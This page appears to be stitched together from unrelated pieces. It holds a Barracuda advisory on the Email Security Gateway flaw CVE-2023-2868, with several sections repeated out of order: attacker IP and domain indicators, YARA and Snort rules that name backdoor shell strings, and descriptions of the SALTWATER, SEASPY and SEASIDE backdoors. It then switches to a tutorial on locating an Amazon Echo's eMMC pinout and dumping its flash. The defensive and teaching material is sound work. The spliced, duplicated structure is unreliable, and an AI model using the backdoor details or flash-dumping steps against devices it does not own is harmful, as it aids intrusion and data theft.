Table 4 lists the endpoint IOCs, including malware and utilities, attributed to attacker activity during the investigation.

      File Name  MD5 HashType 
1appcheck.shN/ABash script
2aacore.shN/ABash script
31.shN/ABash script
4mod_udp.so827d507aa3bde0ef903ca5dec60cdec8SALTWATER Variant
5intentN/AN/A
6install_helo.tar2ccb9759800154de817bf779a52d48f8TAR Package
7intent_helof5ab04a920302931a8bd063f27b745ccBash script
8pd177add288b289d43236d2dba33e65956Reverse Shell
9update_v31.sh881b7846f8384c12c7481b23011d8e45Bash script
10mod_require_helo.luacd2813f0260d63ad5adf0446253c2172SEASIDE
11BarracudaMailService82eaf69de710abdc5dea7cd5cb56cf04SEASPY
12BarracudaMailServicee80a85250263d58cc1a1dc39d6cf3942SEASPY
13BarracudaMailService5d6cba7909980a7b424b133fbac634acSEASPY
14BarracudaMailService1bbb32610599d70397adfdaf56109ff3SEASPY
15BarracudaMailService4b511567cfa8dbaa32e11baf3268f074SEASPY
16BarracudaMailServicea08a99e5224e1baf569fda816c991045SEASPY
17BarracudaMailService19ebfe05040a8508467f9415c8378f32SEASPY
18mod_udp.so1fea55b7c9d13d822a64b2370d015da7SALTWATER Variant
19mod_udp.so64c690f175a2d2fe38d3d7c0d0ddbb6eSALTWATER Variant
20mod_udp.so4cd0f3219e98ac2e9021b06af70ed643SALTWATER Variant

Table 4: Endpoint IOCs

Network IOCs

Table 5 lists the network IOCs, including IP addresses and domain names, attributed to attacker activity during the investigation.

   IndicatorASNLocation
1xxl17z.dnslog.cnN/AN/A
2mx01.bestfindthetruth.comN/AN/A
364.176.7.59AS-CHOOPAUS
464.176.4.234AS-CHOOPAUS
552.23.241.105AMAZON-AESUS
623.224.42.5CloudRadium L.L.CUS
7192.74.254.229PEG TECH INCUS
8192.74.226.142PEG TECH INCUS
9155.94.160.72QuadraNet Enterprises LLCUS
10139.84.227.9AS-CHOOPAUS
11137.175.60.253PEG TECH INCUS
12137.175.53.170PEG TECH INCUS
13137.175.51.147PEG TECH INCUS
14137.175.30.36PEG TECH INCUS
15137.175.28.251PEG TECH INCUS
16137.175.19.25PEG TECH INCUS
17107.148.219.227PEG TECH INCUS
18107.148.219.55PEG TECH INCUS
19107.148.219.54PEG TECH INCUS
20107.148.219.53PEG TECH INCUS
21107.148.219.227PEG TECH INCUS
22107.148.149.156PEG TECH INCUS
23104.223.20.222QuadraNet Enterprises LLCUS
24103.93.78.142EDGENAP LTDJP
25103.27.108.62TOPWAY GLOBAL LIMITEDHK
26137.175.30.86PEGTECHINCUS
27199.247.23.80AS-CHOOPADE
2838.54.1.82KAOPU CLOUD HK LIMITEDSG
29107.148.223.196PEGTECHINCUS
3023.224.42.29CNSERVERSUS
31137.175.53.17PEGTECHINCUS
32103.146.179.101GIGABITBANK GLOBALHK

Table 5: Network IOCs

YARA Rules

CVE-2023-2868

The following three (3) YARA rules can be used to hunt for the malicious TAR file which exploits CVE-2023-2868:

rule M_Hunting_Exploit_Archive_2
 {
     meta:
         description = "Looks for TAR archive with /tmp/ base64 encoded being part of filename of enclosed files"
         date_created = "2023-05-26"
         date_modified = "2023-05-26"
         md5 = "0d67f50a0bf7a3a017784146ac41ada0"
         version = "1.0"
     strings:
         $ustar = { 75 73 74 61 72 }
         $b64_tmp = "/tmp/" base64
     condition:
         filesize < 1MB and

         $ustar at 257 and

         for any i in (0 .. #ustar) : (

             $b64_tmp in (i * 512 .. i * 512 + 250)

         )
 }

rule M_Hunting_Exploit_Archive_3
 {
     meta:
         description = "Looks for TAR archive with openssl base64 encoded being part of filename of enclosed files"
         date_created = "2023-05-26"
         date_modified = "2023-05-26"
         md5 = "0d67f50a0bf7a3a017784146ac41ada0"
         version = "1.0"
     strings:
         $ustar = { 75 73 74 61 72 }
         $b64_openssl = "openssl" base64
     condition:

         filesize < 1MB and
         $ustar at 257 and

         for any i in (0 .. #ustar) : (

             $b64_openssl in (i * 512 .. i * 512 + 250)

         )
 }

rule M_Hunting_Exploit_Archive_CVE_2023_2868
 {
     meta:
         description = "Looks for TAR archive with single quote/backtick as start of filename of enclosed files. CVE-2023-2868"
         date_created = "2023-05-26"
         date_modified = "2023-05-26"
         md5 = "0d67f50a0bf7a3a017784146ac41ada0"
         version = "1.0"
     strings:
         $ustar = { 75 73 74 61 72 }
         $qb = "'`"
     condition:

         filesize < 1MB and
         $ustar at 257 and

         for any i in (0 .. #ustar) : (

             $qb at (@ustar[i] + 255)

         )
 }

SALTWATER

The following three (3) YARA rule can be used to hunt for SALTWATER:

rule M_Hunting_Linux_Funchook
 {
     strings:
         $f = "funchook_"
         $s1 = "Enter funchook_create()"
         $s2 = "Leave funchook_create() => %p"
         $s3 = "Enter funchook_prepare(%p, %p, %p)"
         $s4 = "Leave funchook_prepare(..., [%p->%p],...) => %d"
         $s5 = "Enter funchook_install(%p, 0x%x)"
         $s6 = "Leave funchook_install() => %d"
         $s7 = "Enter funchook_uninstall(%p, 0x%x)"
         $s8 = "Leave funchook_uninstall() => %d"
         $s9 = "Enter funchook_destroy(%p)"
         $s10 = "Leave funchook_destroy() => %d"
         $s11 = "Could not modify already-installed funchook handle."
         $s12 = "  change %s address from %p to %p"
         $s13 = "  link_map addr=%p, name=%s"
         $s14 = "  ELF type is neither ET_EXEC nor ET_DYN."
         $s15 = "  not a valid ELF module %s."
         $s16 = "Failed to protect memory %p (size=%"
         $s17 = "  protect memory %p (size=%"
         $s18 = "Failed to unprotect memory %p (size=%"
         $s19 = "  unprotect memory %p (size=%"
         $s20 = "Failed to unprotect page %p (size=%"
         $s21 = "  unprotect page %p (size=%"
         $s22 = "Failed to protect page %p (size=%"
         $s23 = "  protect page %p (size=%"
         $s24 = "Failed to deallocate page %p (size=%"
         $s25 = " deallocate page %p (size=%"
         $s26 = "  allocate page %p (size=%"
         $s27 = "  try to allocate %p but %p (size=%"
         $s28 = "  allocate page %p (size=%"
         $s29 = "Could not find a free region near %p"
         $s30 = "  -- Use address %p or %p for function %p"
     condition:
         filesize < 15MB and uint32(0) == 0x464c457f and (#f > 5 or 4 of ($s*))
 }

rule M_Hunting_Linux_SALTWATER_1
 {
     strings:
         $s1 = { 71 75 69 74 0D 0A 00 00 00 33 8C 25 3D 9C 17 70 08 F9 0C 1A 41 71 55 36 1A 5C 4B 8D 29 7E 0D 78 }
         $s2 = { 00 8B D5 AD 93 B7 54 D5 00 33 8C 25 3D 9C 17 70 08 F9 0C 1A 41 71 55 36 1A 5C 4B 8D 29 7E 0D 78 }
     condition:
         filesize < 15MB and uint32(0) == 0x464c457f and any of them
 }

rule M_Hunting_Linux_SALTWATER_2
 {
     strings:
         $c1 = "TunnelArgs"
         $c2 = "DownloadChannel"
         $c3 = "UploadChannel"
         $c4 = "ProxyChannel"
         $c5 = "ShellChannel"
         $c6 = "MyWriteAll"
         $c7 = "MyReadAll"
         $c8 = "Connected2Vps"
         $c9 = "CheckRemoteIp"
         $c10 = "GetFileSize"
         $s1 = "[-] error: popen failed"
         $s2 = "/home/product/code/config/ssl_engine_cert.pem"
         $s3 = "libbindshell.so"
     condition:
         filesize < 15MB and uint32(0) == 0x464c457f and (2 of ($s*) or 4 of ($c*))
 }

The following SNORT rule can be used to hunt for SEASPY magic packets:

alert tcp any any -> any [25,587] (msg:»M_Backdoor_SEASPY»; flags:S; dsize:>9; content:»oXmp»; offset:0; depth:4; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000000; rev:1;)

The following SNORT rules require Suricata 5.0.4 or newer and can be used to hunt for SEASPY magic packets:

alert tcp any any -> any [25,587] (msg:»M_Backdoor_SEASPY_1358″; flags:S; tcp.hdr; content:»|05 4e|»; offset:22; depth:2; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000001; rev:1;)

alert tcp any any -> any [25,587] (msg:»M_Backdoor_SEASPY_58928″; flags:S; tcp.hdr; content:»|e6 30|»; offset:28; depth:2; byte_test:4,>,16777216,0,big,relative; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000002; rev:1;)

alert tcp any any -> any [25,587] (msg:»M_Backdoor_SEASPY_58930″; flags:S; tcp.hdr; content:»|e6 32|»; offset:28; depth:2; byte_test:4,>,16777216,0,big,relative; byte_test:2,>,0,0,big,relative; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000003; rev:1;)

MAY 30th, 2023:

Preliminary Summary of Key Findings

Barracuda Networks priorities throughout this incident have been transparency and to use this as an opportunity to strengthen our policies, practices, and technology to further protect against future attacks. Although our investigation is ongoing, the purpose of this document is to share preliminary findings, provide the known Indicators of Compromise (IOCs), and share YARA rules to aid our customers in their investigations, including with respect to their own environments.

Timeline

  • On May 18, 2023, Barracuda was alerted to anomalous traffic originating from Barracuda Email Security Gateway (ESG) appliances.
  • On May 18, 2023, Barracuda engaged Mandiant, leading global cyber security experts, to assist in the investigation.
  • On May 19, 2023, Barracuda identified a vulnerability (CVE-2023-28681) in our Email Security Gateway appliance (ESG).
  • On May 20, 2023, a security patch to remediate the vulnerability was applied to all ESG appliances worldwide.
  • On May 21, 2023, a script was deployed to all impacted appliances to contain the incident and counter unauthorized access methods.
  • A series of security patches are being deployed to all appliances in furtherance of our containment strategy.

Key Findings

While the investigation is still on-going, Barracuda has concluded the following:

  • The vulnerability existed in a module which initially screens the attachments of incoming emails. No other Barracuda products, including our SaaS email security services, were subject to the vulnerability identified.
  • Earliest identified evidence of exploitation of CVE-2023-2868 is currently October 2022.
  • Barracuda identified that CVE-2023-2868 was utilized to obtain unauthorized access to a subset of ESG appliances.
  • Malware was identified on a subset of appliances allowing for persistent backdoor access.
  • Evidence of data exfiltration was identified on a subset of impacted appliances.

Users whose appliances we believe were impacted have been notified via the ESG user interface of actions to take. Barracuda has also reached out to these specific customers. Additional customers may be identified in the course of the investigation.

CVE-2023-2868

On May 19, 2023, Barracuda Networks identified a remote command injection vulnerability (CVE-2023-2868) present in the Barracuda Email Security Gateway (appliance form factor only) versions 5.1.3.001-9.2.0.006. The vulnerability stemmed from incomplete input validation of user supplied .tar files as it pertains to the names of the files contained within the archive. Consequently, a remote attacker could format file names in a particular manner that would result in remotely executing a system command through Perl’s qx operator with the privileges of the Email Security Gateway product.

Barracuda’s investigation to date has determined that a third party utilized the technique described above to gain unauthorized access to a subset of ESG appliances.

Malware

This section details the malware that has been identified to date.

SALTWATER

SALTWATER is a trojanized module for the Barracuda SMTP daemon (bsmtpd) that contains backdoor functionality. The capabilities of SALTWATER include the ability to upload or download arbitrary files, execute commands, as well as proxy and tunneling capabilities.

Identified at path: /home/product/code/firmware/current/lib/smtp/modules on a subset of ESG appliances.

The backdoor is implemented using hooks on the send, recv, close syscalls and amounts to five components, most of which are referred to as “Channels” within the binary. In addition to providing backdoor and proxying capabilities, these components exhibit classic backdoor functionality.  The five (5) channels can be seen in the list below.

  • DownloadChannel
  • UploadChannel
  • ProxyChannel
  • ShellChannel
  • TunnelArgs

Mandiant is still analyzing SALTWATER to determine if it overlaps with any other known malware families. Table 1 below provides the file metadata related to a SALTWATER variant.

Table 1 below provides the file metadata related to a SALTWATER variant.

NameSHA256
mod_udp.so1c6cad0ed66cf8fd438974e1eac0bc6dd9119f84892930cb71cb56a5e985f0a4
MD5File TypeSize (Bytes)
827d507aa3bde0ef903ca5dec60cdec8ELF x861,879,643

Table 1: SALTWATER variant metadata

SEASPY

SEASPY is an x64 ELF persistence backdoor that poses as a legitimate Barracuda Networks service and establishes itself as a PCAP filter, specifically monitoring traffic on port 25 (SMTP). SEASPY also contains backdoor functionality that is activated by a «magic packet».

Identified at path: /sbin/ on a subset of ESG appliances.

Mandiant analysis has identified code overlap between SEASPY and cd00r, a publicly available backdoor.

Table 2 below provides the file metadata related to a SEASPY variant.

NameSHA256
BarracudaMailService3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115
MD5File TypeSize (Bytes)
4ca4f582418b2cc0626700511a6315c0ELF x642,924,217

Table 2: SEASPY variant metadata

SEASIDE

SEASIDE is a Lua based module for the Barracuda SMTP daemon (bsmtpd) that monitors SMTP HELO/EHLO commands to receive a command and control (C2) IP address and port which it passes as arguments to an external binary that establishes a reverse shell.

Table 3 below provides the file metadata related to a SEASIDE.

NameSHA256
mod_require_helo.luafa8996766ae347ddcbbd1818fe3a878272653601a347d76ea3d5dfc227cd0bc8
MD5File TypeSize (Bytes)
cd2813f0260d63ad5adf0446253c2172Lua module2,724

Table 3: SEASIDE metadata

Recommendations For Impacted Customers

  1. Ensure your ESG appliance is receiving and applying updates, definitions, and security patches from Barracuda. Contact Barracuda support (support@barracuda.com) to validate if the appliance is up to date.
  2. Discontinue the use of the compromised ESG appliance and contact Barracuda support (support@barracuda.com) to obtain a new ESG virtual or hardware appliance.
  3. Rotate any applicable credentials connected to the ESG appliance:
    o  Any connected LDAP/AD
    o  Barracuda Cloud Control
    o  FTP Server
    o  SMB
    o  Any private TLS certificates
  4. Review your network logs for any of the IOCs listed below and any unknown IPs. Contact compliance@barracuda.com if any are identified.

To support customers in the investigations of their environments, we are providing a list of all endpoint and network indicators observed over the course of the investigation to date. We have also developed a series of YARA rules that can be found in the section below.

Endpoint IOCs

Table 4 lists the endpoint IOCs, including malware and utilities, attributed to attacker activity during the investigation.

      File Name  MD5 HashType 
1appcheck.shN/ABash script
2aacore.shN/ABash script
31.shN/ABash script
4mod_udp.so827d507aa3bde0ef903ca5dec60cdec8SALTWATER Variant
5intentN/AN/A
6install_helo.tar2ccb9759800154de817bf779a52d48f8TAR Package
7intent_helof5ab04a920302931a8bd063f27b745ccBash script
8pd177add288b289d43236d2dba33e65956Reverse Shell
9update_v31.sh881b7846f8384c12c7481b23011d8e45Bash script
10mod_require_helo.luacd2813f0260d63ad5adf0446253c2172SEASIDE
11BarracudaMailService82eaf69de710abdc5dea7cd5cb56cf04SEASPY
12BarracudaMailServicee80a85250263d58cc1a1dc39d6cf3942SEASPY
13BarracudaMailService5d6cba7909980a7b424b133fbac634acSEASPY
14BarracudaMailService1bbb32610599d70397adfdaf56109ff3SEASPY
15BarracudaMailService4b511567cfa8dbaa32e11baf3268f074SEASPY
16BarracudaMailServicea08a99e5224e1baf569fda816c991045SEASPY
17BarracudaMailService19ebfe05040a8508467f9415c8378f32SEASPY
18mod_udp.so1fea55b7c9d13d822a64b2370d015da7SALTWATER Variant
19mod_udp.so64c690f175a2d2fe38d3d7c0d0ddbb6eSALTWATER Variant
20mod_udp.so4cd0f3219e98ac2e9021b06af70ed643SALTWATER Variant

Table 4: Endpoint IOCs

Network IOCs

Table 5 lists the network IOCs, including IP addresses and domain names, attributed to attacker activity during the investigation.

   IndicatorASNLocation
1xxl17z.dnslog.cnN/AN/A
2mx01.bestfindthetruth.comN/AN/A
364.176.7.59AS-CHOOPAUS
464.176.4.234AS-CHOOPAUS
552.23.241.105AMAZON-AESUS
623.224.42.5CloudRadium L.L.CUS
7192.74.254.229PEG TECH INCUS
8192.74.226.142PEG TECH INCUS
9155.94.160.72QuadraNet Enterprises LLCUS
10139.84.227.9AS-CHOOPAUS
11137.175.60.253PEG TECH INCUS
12137.175.53.170PEG TECH INCUS
13137.175.51.147PEG TECH INCUS
14137.175.30.36PEG TECH INCUS
15137.175.28.251PEG TECH INCUS
16137.175.19.25PEG TECH INCUS
17107.148.219.227PEG TECH INCUS
18107.148.219.55PEG TECH INCUS
19107.148.219.54PEG TECH INCUS
20107.148.219.53PEG TECH INCUS
21107.148.219.227PEG TECH INCUS
22107.148.149.156PEG TECH INCUS
23104.223.20.222QuadraNet Enterprises LLCUS
24103.93.78.142EDGENAP LTDJP
25103.27.108.62TOPWAY GLOBAL LIMITEDHK

Table 5: Network IOCs

YARA Rules

CVE-2023-2868

The following three (3) YARA rules can be used to hunt for the malicious TAR file which exploits CVE-2023-2868:

rule M_Hunting_Exploit_Archive_2
 {
     meta:
         description = "Looks for TAR archive with /tmp/ base64 encoded being part of filename of enclosed files"
         date_created = "2023-05-26"
         date_modified = "2023-05-26"
         md5 = "0d67f50a0bf7a3a017784146ac41ada0"
         version = "1.0"
     strings:
         $ustar = { 75 73 74 61 72 }
         $b64_tmp = "/tmp/" base64
     condition:
         filesize < 1MB and

         $ustar at 257 and

         for any i in (0 .. #ustar) : (

             $b64_tmp in (i * 512 .. i * 512 + 250)

         )
 }

rule M_Hunting_Exploit_Archive_3
 {
     meta:
         description = "Looks for TAR archive with openssl base64 encoded being part of filename of enclosed files"
         date_created = "2023-05-26"
         date_modified = "2023-05-26"
         md5 = "0d67f50a0bf7a3a017784146ac41ada0"
         version = "1.0"
     strings:
         $ustar = { 75 73 74 61 72 }
         $b64_openssl = "openssl" base64
     condition:

         filesize < 1MB and
         $ustar at 257 and

         for any i in (0 .. #ustar) : (

             $b64_openssl in (i * 512 .. i * 512 + 250)

         )
 }

rule M_Hunting_Exploit_Archive_CVE_2023_2868
 {
     meta:
         description = "Looks for TAR archive with single quote/backtick as start of filename of enclosed files. CVE-2023-2868"
         date_created = "2023-05-26"
         date_modified = "2023-05-26"
         md5 = "0d67f50a0bf7a3a017784146ac41ada0"
         version = "1.0"
     strings:
         $ustar = { 75 73 74 61 72 }
         $qb = "'`"
     condition:

         filesize < 1MB and
         $ustar at 257 and

         for any i in (0 .. #ustar) : (

             $qb at (@ustar[i] + 255)

         )
 }

SALTWATER

The following three (3) YARA rule can be used to hunt for SALTWATER:

rule M_Hunting_Linux_Funchook
 {
     strings:
         $f = "funchook_"
         $s1 = "Enter funchook_create()"
         $s2 = "Leave funchook_create() => %p"
         $s3 = "Enter funchook_prepare(%p, %p, %p)"
         $s4 = "Leave funchook_prepare(..., [%p->%p],...) => %d"
         $s5 = "Enter funchook_install(%p, 0x%x)"
         $s6 = "Leave funchook_install() => %d"
         $s7 = "Enter funchook_uninstall(%p, 0x%x)"
         $s8 = "Leave funchook_uninstall() => %d"
         $s9 = "Enter funchook_destroy(%p)"
         $s10 = "Leave funchook_destroy() => %d"
         $s11 = "Could not modify already-installed funchook handle."
         $s12 = "  change %s address from %p to %p"
         $s13 = "  link_map addr=%p, name=%s"
         $s14 = "  ELF type is neither ET_EXEC nor ET_DYN."
         $s15 = "  not a valid ELF module %s."
         $s16 = "Failed to protect memory %p (size=%"
         $s17 = "  protect memory %p (size=%"
         $s18 = "Failed to unprotect memory %p (size=%"
         $s19 = "  unprotect memory %p (size=%"
         $s20 = "Failed to unprotect page %p (size=%"
         $s21 = "  unprotect page %p (size=%"
         $s22 = "Failed to protect page %p (size=%"
         $s23 = "  protect page %p (size=%"
         $s24 = "Failed to deallocate page %p (size=%"
         $s25 = " deallocate page %p (size=%"
         $s26 = "  allocate page %p (size=%"
         $s27 = "  try to allocate %p but %p (size=%"
         $s28 = "  allocate page %p (size=%"
         $s29 = "Could not find a free region near %p"
         $s30 = "  -- Use address %p or %p for function %p"
     condition:
         filesize < 15MB and uint32(0) == 0x464c457f and (#f > 5 or 4 of ($s*))
 }

rule M_Hunting_Linux_SALTWATER_1
 {
     strings:
         $s1 = { 71 75 69 74 0D 0A 00 00 00 33 8C 25 3D 9C 17 70 08 F9 0C 1A 41 71 55 36 1A 5C 4B 8D 29 7E 0D 78 }
         $s2 = { 00 8B D5 AD 93 B7 54 D5 00 33 8C 25 3D 9C 17 70 08 F9 0C 1A 41 71 55 36 1A 5C 4B 8D 29 7E 0D 78 }
     condition:
         filesize < 15MB and uint32(0) == 0x464c457f and any of them
 }

rule M_Hunting_Linux_SALTWATER_2
 {
     strings:
         $c1 = "TunnelArgs"
         $c2 = "DownloadChannel"
         $c3 = "UploadChannel"
         $c4 = "ProxyChannel"
         $c5 = "ShellChannel"
         $c6 = "MyWriteAll"
         $c7 = "MyReadAll"
         $c8 = "Connected2Vps"
         $c9 = "CheckRemoteIp"
         $c10 = "GetFileSize"
         $s1 = "[-] error: popen failed"
         $s2 = "/home/product/code/config/ssl_engine_cert.pem"
         $s3 = "libbindshell.so"
     condition:
         filesize < 15MB and uint32(0) == 0x464c457f and (2 of ($s*) or 4 of ($c*))
 }

MAY 23rd, 2023:

Barracuda identified a vulnerability (CVE-2023-2868) in our Email Security Gateway appliance (ESG) on May 19, 2023. A security patch to eliminate the vulnerability was applied to all ESG appliances worldwide on Saturday, May 20, 2023. The vulnerability existed in a module which initially screens the attachments of incoming emails. No other Barracuda products, including our SaaS email security services, were subject to this vulnerability.

We took immediate steps to investigate this vulnerability. Based on our investigation to date, we’ve identified that the vulnerability resulted in unauthorized access to a subset of email gateway appliances. As part of our containment strategy, all ESG appliances have received a second patch on May 21, 2023. Users whose appliances we believe were impacted have been notified via the ESG user interface of actions to take. Barracuda has also reached out to these specific customers.

We will continue actively monitoring this situation, and we will be transparent in sharing details on what actions we are taking. Information gathering is ongoing as part of the investigation. We want to ensure we only share validated information with actionable steps for you to take. As we have information to share, we will provide updates via this product status page (https://status.barracuda.com) and direct outreach to impacted customers. Updates are also located on Barracuda’s Trust Center (https://www.barracuda.com/company/legal).

Barracuda’s investigation was limited to the ESG product, and not the customer’s specific environment. Therefore, impacted customers should review their environments and determine any additional actions they want to take.

Your trust is important to us. We thank you for your understanding and support as we work through this issue and sincerely apologize for any inconvenience it may cause. If you have any questions, please reach out to support@barracuda.com.

HARDWARE HACKING 101: IDENTIFYING AND DUMPING EMMC FLASH

HARDWARE HACKING 101: IDENTIFYING AND DUMPING EMMC FLASH

Original text by KAREEM ELFARAMAW

Introduction

Welcome back to our introduction to hardware hacking series! In this post we will be covering embedded MultiMediaCard (eMMC) flash chips and the standard protocol they use. eMMC is a form of managed flash storage typically used in phones, tablets, and many IoT devices because of its low power consumption and high performance. If you haven’t already, make sure to check out our other intro to hardware hacking posts on our blog.

We’ll also be tearing down an Amazon Echo to show how to use logic traces to identify a pinout for an eMMC chip. Lastly, we’ll walk through options for dumping the contents of the chip while it’s still on the board, as well as when it’s lifted off.

MMC & eMMC Background

MultiMediaCard (MMC) is a form of solid-state storage originally created for use with portable devices, such as cameras. It features a low pin count, along with a simple parallel interface for communicating with it. This standard was later improved upon as the Secure Digital (SD) standard, which had much better performance while keeping the same simple interface. Often you’ll see that SD cards contain two primary components: a NAND flash chip, and a flash controller. NAND flash is a type of flash memory used in many embedded devices, typically seen in TSOP-48 or BGA-63 packages. Other types of flash memory include NOR flash and Vertical NAND flash. The NAND flash is the non-volatile storage where all of the data on the SD card is stored, while the flash controller provides an interface to the NAND flash in the form of the data pins on the SD card.

Internals of an SD card. Source: Engineers Garage

To read and write to the NAND chip, the host only needs to communicate with the flash controller, which will internally manage all interactions with the NAND chip. With this setup, the controller can contain algorithms to handle many of the complexities of using NAND flash without the host needing to do any additional work. Some of these include:

  • Error correction code (ECC) handling
  • Wear leveling
  • NAND whitening

As the name implies, eMMC combines all of the components used for MMC into a single die and places it into a package that can be used in embedded devices, typically into a single ball grid array (BGA) chip. These chips will expose the same interface seen in MMC/SD cards, so a host will be able to follow the same protocol for communicating with them.

Some manufacturers opt to create a configuration that is essentially an SD card built into a larger board, consisting of a separate NAND flash chip and SD controller. As shown in the above diagrams, the interface for this setup is the same as a single eMMC chip, so everything detailed in this post will apply to these as well.

eMMC Bus Signals

The eMMC protocol is capable of operating in 1-bit, 4-bit, or 8-bit parallel I/O depending on the number of data lines being used. A command signal is used for initializing the eMMC chip and sending read/write commands. A single clock signal is used to synchronize all command and data lines, where they can be sampled on either the rising edge only, or both rising and falling edges for faster performance. These signals and additional pins are detailed in the table below:

eMMC Pinout Table

PinDescription
CLKClock line used to synchronize CMD and all DAT lines
CMDBidirectional line used for sending commands and responses to/from the chip. This is used during initialization to determine the number of data lines that should be enabled, the desired clock speed, and any other operating conditions.
DAT0Bidirectional data line, used in 1-bit, 4-bit, 8-bit modes
DAT1Bidirectional data line, used in 4-bit, 8-bit modes
DAT2Bidirectional data line, used in 4-bit, 8-bit modes
DAT3Bidirectional data line, used in 4-bit, 8-bit modes
DAT4Bidirectional data line, used in 8-bit mode
DAT5Bidirectional data line, used in 8-bit mode
DAT6Bidirectional data line, used in 8-bit mode
DAT7Bidirectional data line, used in 8-bit mode
VCCInput voltage for flash storage, usually +3.3V
VCCQInput voltage for flash controller, usually +1.8V or +3.3V
VSS / VSSQGND for flash storage and flash controller

Command Structure

The commands sent on the CMD line follow a fairly simple structure, and knowing how these look will help in identifying CMD in a logic trace. Commands are encoded in the following 48-bit structure:


Name
Length (Bits)Description
Start bit1Start of a command, always ‘0’
Transmission bit1Indicates the direction of the command. 
1: Host->Card 
0: Card->Host
Command index6Value between 0-63 indicating the command type
Command argument32Value to be used by the command, e.g. an address
CRC7Checksum to validate the data was read correctly
End bit1End of a command, always ‘1’

Hands On

Now let’s take a look at a first generation Amazon Echo to show how to identify a pinout for an eMMC chip. Knowing this pinout, it may be possible to dump the contents of the chip without removing it from the PCB. However, in cases where that doesn’t work, we’ll cover a simple alternative once the chip is already lifted.

Here’s the device we’ll be working with:

Materials

The following materials are needed to follow along with this tutorial. You can pick these or other products that serve the same purpose. Links are included for your convenience (but note that we don’t endorse any of these vendors or products):

Needed to Follow Along
Needed for dumping lifted chip

Amazon Echo: Disassembly

The first step in taking apart the Amazon Echo starts at the bottom of the device. There’s a rubber cover lightly glued in place. Pulling up from the side is enough to pull it off.

Next, there are 4 T10 screws that need to be removed in order to remove the bottom plate and access the first PCB.

Carefully lift the bottom plate out, and you’ll see speaker plugs and a ribbon cable still attached to the PCB. Pull the speaker plugs out, and disconnect the ribbon cable by lifting the dark brown lever away from the board.

Now the next plate covering the speaker can be lifted out. There are holes in this plate for the speaker cables and ribbon cable to pass through.

Then, the outer casing can be pulled off.

Next, peel off the felt paper wrapped around the device. There are a few glue strips holding it in place, so peeling these off the plastic as you go will allow the felt to come off cleanly.

To remove the main PCB, there are 4 more T10 screws that need to be removed and 2 ribbon cables that need to be disconnected. The top cable (J21) is glued to the plastic with another glue strip. We’ll need this to power the main PCB later, so carefully peel off and remove the ribbon cable.

With the main PCB off, now we can take a look at all the components on it. These have been labeled in the image below:

Amazon Echo: Logic Analyzer Setup

For now we only want to focus on the eMMC chip, which on this unit is a KIOXIA THGBMBG5D1KBAIT 4GB eMMC. Lucky for us, this board has as a number of test points on the other side of the board, directly opposite the eMMC chip.

The plan is to attach jumper wires to all of these pads and capture traces on the logic analyzer. From these, we should be able to identify a few of the main pins necessary to read an eMMC chip. The bare minimum we need is 3 pins to operate in 1-bit mode: CMD, CLK, and DAT0, along with a way to power the chip.

For this, I made some jumper wires with 30awg wire. Having a thin gauge wire like this is always very useful when soldering to any small components or pads like the ones on this board. Solder them all to the pads so we can take logic analyzer captures.

We also need a ground reference for the logic analyzer. On the same side of the board, the copper pad at P2 can be used for this. You can confirm this is ground by checking continuity between this and the shielding pads on the other side (the “dashed lines” of pads surrounding the chips).

To power the board, we need the ribbon cable and bottom plate of the echo we removed earlier. We can connect all of these together and plug in the power supply, and that will power the main PCB so we can capture traces. Here’s what the setup should look like:

You’ll need more than one capture to account for all the pads being tested here. In each case, start a capture and power on the device, and you should see traces similar to the images below:

Capture 1

Capture 2

NOTE: Pin 1 is not connected

Trace Breakdown: Identifying Pins

It turns out that the first capture here has all the pins that we’re interested in. The first, and most obvious, is the CLK pin. This is Channel 1 in the example trace above, easy to identify by its fixed rate oscillation.

Next, we can try to identify CMD. This will be a line that’s active along with the CLK, and follows the structure covered above. We can use the Logic software to help identify this by adding an analyzer for parallel I/O. This is the “Simple Parallel” option:

In the next menu, set the clock to the channel we already identified as CLK (Channel 1), and set D0 to a channel we want to analyze further. In this case, let’s look at ‘Channel 0’. Set all the other channels to ‘None’ (Tab + N is your friend here) and click ‘Save’.

Now if you zoom in at a point where both channels are showing activity, the analyzer we just added will show the parsed binary values found by sampling all the rising edges on the clock. Here is an example Host->Card command:

Followed immediately by a Card->Host response:

You can match both of these commands up with the structure we covered before.

  1. In the first image, we see a start bit, 0, followed by 1 to indicate this is a Host->Card command, and the last bit is a 1.
  2. The second image starts with 0, 0, indicating this is a Card->Host response, and once again ends in a 1.

We can see many commands following this same structure throughout the capture, so we can be fairly confident this is the CMD line.

Finally, we want to identify the DAT0 line. When initializing an eMMC chip, DAT0 is the only active data line since every host is capable of 1-bit communication. During the initialization phase the host and card will agree on the total number of data lines to be used, but by default it is always only 1. So, all we need to do is go to the beginning of the capture and see which data line shows activity first after CLK and CMD start up.

Here we can clearly see that after the first series of commands are sent, Channel 7 is the first to respond, so this likely DAT0.

Now looking back at the board, you should have identified the following pinout:

“Alexa, give me a flash dump”

Depending on the device you’re working with, it may be possible at this point to dump the eMMC flash just by connecting to the pins that have been identified. Since this is the same MMC protocol used by SD cards, there are various adapters that can be used to connect to these pins and read them with any SD card reader. There are some pre-made examples, such as this Sparkfun SD Sniffer, where you can solder headers to the board and connect the pins to them directly.

There’s also a similar microSD version made by exploitee.rs that only uses one data pin:

If you don’t have any of these but have a microSD to SD adapter, you can even turn that into a reader by breaking out all the pins inside:

Attempting to dump the chip while on the board may run into a few common issues. When powering on the board normally, the CPU is going to initialize and access the eMMC chip. Attempting to read the chip on another computer while this is happening will likely result in failing to detect it at all. One option around this is to try preventing the CPU from going through it’s normal boot process. For example, if you’re working on a device where the CPU uses a bootloader on a separate SPI flash, you can manually deselect the SPI by pulling its CS pin high or low (depending on the chip). This leaves the eMMC powered on but untouched by the CPU.

Another option is to try powering the eMMC chip externally when you try reading it. However, attempting to do this could result in other devices getting powered, such as the CPU, which results in the same issues as before. In the case of this test device, I wasn’t able to get it reading while still on the board, so now we’ll look into how to dump it by lifting it off the board.

Lifting & Reading the Chip

The first step is of course to lift the eMMC chip off the board. The easiest way to do this is using either a hot air station, or an infrared rework station. Here’s a simple tutorial on how to do this with hot air.

Once lifted, clean off all the remaining solder on the chip using solder wick. The chip should now look like this:

